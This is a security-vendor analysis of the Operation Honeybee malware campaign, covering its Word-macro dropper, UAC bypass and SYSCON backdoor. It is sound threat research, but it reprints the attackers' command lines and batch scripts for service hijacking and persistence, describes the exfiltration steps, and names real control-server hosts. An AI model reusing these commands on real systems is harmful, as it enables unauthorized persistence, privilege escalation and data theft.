This post was written with contributions from Jessica Saavedra-Morales, Thomas Roccia, and Asheer Malhotra.
McAfee Advanced Threat Research analysts have discovered a new operation targeting humanitarian aid organizations and using North Korean political topics as bait to lure victims into opening malicious Microsoft Word documents. Our analysts have named this Operation Honeybee, based on the names of the malicious documents used in the attacks.
Advanced Threat Research analysts have also discovered malicious documents authored by the same actor that indicate a tactical shift. These documents do not contain the typical lures by this actor, instead using Word compatibility messages to entice victims into opening them.
The Advanced Threat Research team also observed a heavy concentration of the implant in Vietnam from January 15–17.
On January 15, Advanced Threat Research discovered an operation using a new variant of the SYSCON backdoor. The Korean-language Word document manual.doc appeared in Vietnam on January 17, with the original author name of Honeybee.
This malicious document contains a Visual Basic macro that dropped and executed an upgraded version of the implant known as SYSCON, which appeared in 2017 in malicious Word documents as part of several campaigns using North Korea–related topics. The malicious Visual Basic script uses a unique key (custom alphabet) to encode data. We have seen this in previous operations using SYSCON. This key was also used in the Honeybee campaign and appears to have been used since August 2017.
Examples of decoy documents.
Several additional documents surfaced between January 17 and February 3. All contain the same Visual Basic macro code and author name as Honeybee. Some of the malicious documents were test files without the implant. From our analysis, most these documents were submitted from South Korea, indicating that some of the targeting was in South Korea. These Honeybee documents did not contain any specific lures, rather variations of a “not compatible” message attempting to convince the user to enable content.
We also observed a related malicious document created January 12 by the author Windows User that contained a different encoding key, but essentially used the same macro and same type of implant as we saw with the recent Honeybee documents. This document, “International Federation of Red Cross and Red Crescent Societies – DPRK Country Office,” drops an implant with the control server address 1113427185.ifastnet.org, which resolves to the same server used by the implants dropped in the Honeybee case.
The directory contents of control server 1113427185.ifastnet.org.
The directory contents of ftp.byethost11.com, from Honeybee samples.
Log files of compromised machines from February 2018 Honeybee samples.
Aside from finding the malicious documents, the Advanced Threat Research team discovered a Win32-based executable dropper. This dropper uses a stolen digital signature from Adobe Systems. This certificate is also used by another Korean-language malware compiled January 16 (hash: 35904f482d37f5ce6034d6042bae207418e450f4) with an interesting program database (PDB) path.
The malware is a Win32 executable that pretends to be a Word document based on its icon. This is a dropper for the same type of malware as observed with the other Word documents. This sample also dropped a decoy document with the author name Honeybee. This sample, however, contained a bug that interfered with the execution flow of the dropper, suggesting that the authors did not test the malware after code signing it.
The decoy document uses the cloud-based accounting software company Xero as a lure:
A decoy document from MaoCheng dropper.
The Advanced Threat Research team has identified the following persona (firstname.lastname@example.org) tied to this recent operation. Based on our analysis, the actor registered two free hosting accounts: navermail.byethost3.com, which refers to the popular South Korean search engine, and nihon.byethost11.com. The email address was used to register a free account for a control server in all the implants described in our analysis.
Let’s start with an overview of the attack:
We continue with the components involved in this operation.
The malicious Word file is the beginning of the infection chain and acts as a dropper for two DLL files. The Word file contains malicious Visual Basic macro code that runs when the document is opened in Word using the Document_Open() autoload function. The word file also contains a Base64-encoded file (encoded with a custom key) in it that is read, decoded, and dropped to the disk by the macro.
The Document_Open() subroutine implementing the malicious functionality.
The Visual Basic macro performs the following tasks:
- Opens a handle to the malicious document to read the encoded CAB file
- Decodes the CAB file and writes it to the disk at %temp%\setup.cab
Encoded CAB file in the Word document.
Decoding and writing the CAB file to %temp%.
The decoded CAB file in the Visual Basic memory buffer.
The CAB file contains the following files and functions:
- dll: A malicious DLL used to launch batch files (used with cliconfg.exe for UAC bypass). The DLL contains the following PDB path: D:\Task\MiMul\NTWDBLIB\Release\NTWDBLIB.pdb.
- bat: A batch file to set up the service COMSysApp, for an x64 system
- bat: A batch file to set up the service COMSysApp, for an x86 system
- ini: A data file with Base64-encoded data for connecting to an FTP server. Credentials are encoded in the .ini file.
Decoded credential data contained in ipnet.ini.
- dll: The malicious DLL file run as a service (using svchost.exe). The DLL contains the following PDB path: D:\Task\MiMul\FTPCom_vs10\Release\Engine.pdb.
- The macro then extracts the CAB file into %systemroo%\system32, using either wusa.exe or expand.exe (depending on the OS) to again bypass UAC prompts
- Once the files have been extracted, the Visual Basic macro deletes the CAB file and runs the malicious NTWDBLIB.dll via cliconfg.exe (to gain privileges and bypass UAC protections)
- Command lines used by the Visual Basic macro:
cmd /c wusa %TEMP%\setup.cab /quiet /extract:%SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe cmd /c expand %TEMP%\setup.cab -F:* %SystemRoot%\System32 && del /f /q %TEMP%\setup.cab && cliconfg.exe
A combination of NTWDBLIB.dll and cliconfg.exe are used to bypass UAC protections; this is a familiar attack on Windows. UAC bypass via DLL hijacking requires:
- A Windows executable with the auto-elevate property in its manifest
- A Windows executable in a secure directory (%systemroot%\system32)
The malicious NTWDBLIB DLL performs the simple task of setting up the malicious ipnet.dll as a service by running one of the two batch files contained in the CAB file (which is also dropped to %systemroot%\system32):
NTWDBLIB executing the installer batch files under the context of cliconfg.exe.
The batch files involved in the attack modify the system service COMSysApp to load the malicious ipnet.dll. The contents of the batch files vary depending on the OS (x64 vs x86):
@echo off sc stop COMSysApp sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\SysWOW64\svchost.exe -k COMSysApp" reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\SysWOW64\ipnet.dll" /f sc start COMSysApp del /f /q %windir%\SysWOW64\install2.bat del /f /q %windir%\SysWOW64\install1.bat
@echo off sc stop COMSysApp sc config COMSysApp type= own start= auto error= normal binpath= "%windir%\System32\svchost.exe -k COMSysApp" reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SvcHost" /v COMSysApp /t REG_MULTI_SZ /d "COMSysApp" /f reg add "HKLM\SYSTEM\CurrentControlSet\Services\COMSysApp\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%windir%\system32\ipnet.dll" /f sc start COMSysApp del /f /q %windir%\System32\install1.bat del /f /q %windir%\System32\install2.bat
The batch files perform these tasks:
- Stop the service COMSysApp
- Configure the service to autostart (to set up persistence on the system)
- Modify registry keys to launch the DLL unser svchost.exe
- Specify the malicious DLL path to be loaded into the svchost process.
- Immediately restart the service
- Remove the batch files to reduce the fingerprint on the system
IPNet.dll runs as a service under svchost.exe.
The malicious DLL is also responsible for terminating the cliconfg.exe process and deleting the malicious NTWDBLIB.dll using:
cmd /c taskkill /im cliconfg.exe /f /t && del /f /q NTWDBLIB.DLL
All the following capabilities described are implemented by the malicious service DLL implant unless specified.
Variant using North Korean Red Cross
Another variant (hash: 9e2c0bd19a77d712055ccc0276fdc062e9351436) of the malicious Word dropper uses the same Base64-decoding scheme with a different custom key. This document was created January 10.
Contents of the decoy document.
This variant also consists of two CAB files that are dropped to %temp%, depending on the OS (x86 or x64).
The key differences in this variant:
- Two CAB files are encoded into the Word document in text boxes instead of being appended in the DOC file
- There is one CAB file for an x86 system and another for an x64 system
- This malware sample uses uacme.exe with dummy.dll to implement the UAC bypass
- exe is the program vulnerable to the UAC bypass attack
- dll runs install.bat to set up the service (same as NTWDBLIB.dll)
- exe and dummy.dll may be either 64-bit or 32-bit binaries based on the OS. Ipnet.dll may also be either 64-bit or 32-bit.
- The Visual Basic macro uses the following command line:
cmd /c expand %TEMP%\setup.cab -F:* %TEMP% && cd /d %TEMP% && del /f /q setup.cab && uacme.exe
- The control server credential information contained in the CAB files is different:
Decoded credential data contained in another ipnet.ini.
Similarities between this variant and the original malware sample:
- Service name is the same: COMSysApp
- The DLL and ini files contain the same functions as described elsewhere in this post
The following information is gathered from the endpoint and sent to the control server.
- System info:
- Computer name
- System info using: cmd /c systeminfo >%temp%\temp.ini
- List of currently running process using: cmd /c tasklist >%temp%\temp.ini
- The data exfiltration process runs in the following sequence: The temp.ini files are copied into a text file that matches the pattern:
From <COMPUTER-NAME> (<Month>-<Day> <Hour>-<Minute>-<Second>).txt. For example, From <COMPUTER-NAME> (01-04 11-40-02).txt
- All the text files are now packed into the archive temp.zip (%temp%\temp.zip)
- zip is Base64 encoded (with a custom key, same as that used in the malicious document) and then copied to post.txt
- txt is uploaded to the control server
Additional Commands and Capabilities
The service-based DLL implant traverses to the /htdocs/ directory on the FTP server and looks for any files with the keywords:
- TO EVERYONE: Commands issued to all infected endpoints
- TO <COMPUTERNAME>: Commands issued to endpoints matching the ComputerName
The following commands are supported by the malware implant:
- cmd /c pull <filename>: Adds filename to temp.zip, Base64 encodes, and uploads to control server
- cmd /c chip <string>: Deletes current ipnet.ini config file. Writes new config info (control server connection info) to new ipnet.ini.
- cmd /c put <new_file_name> <existing_file_name>: Copies existing file to new file name. Deletes existing file.
- /user <parameters>: Executes downloaded file with parameters specified using CreateProcessAsUser
- cmd /c <command>: Executes command on infected endpoint
The actor behind Honeybee has been operating with new implants since at least November 2017 with the first known version of NTWDBLIB installer. Furthermore, based on the various metadata in both documents and executables, the actor is likely a Korean speaker.
The techniques used in the malicious documents such as the lure messages closely resemble what we have observed before in South Korea. The attacker appears to target those involved in humanitarian aid and inter-Korean affairs. We have seen this operation expand beyond the borders of South Korea to target Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada.
Based on the McAfee Advanced Threat Research team’s analysis, we find multiple components from this operation are unique from a code perspective, even though the code is loosely based on previous versions of the SYSCON backdoor. Some new droppers have not been observed before in the wild. The MaoCheng dropper was apparently created specifically for this operation and appeared only twice in the wild.
Indicators of compromise
MITRE ATT&CK techniques
- Modify existing service
- Code signing
- File deletion
- Deobfuscate/decode files or information
- System information discovery
- Process discovery
- Service execution
- Command-line Interface
- Data from local system
- Automated exfiltration
- Data encrypted
- Commonly used port
- Bypass user account control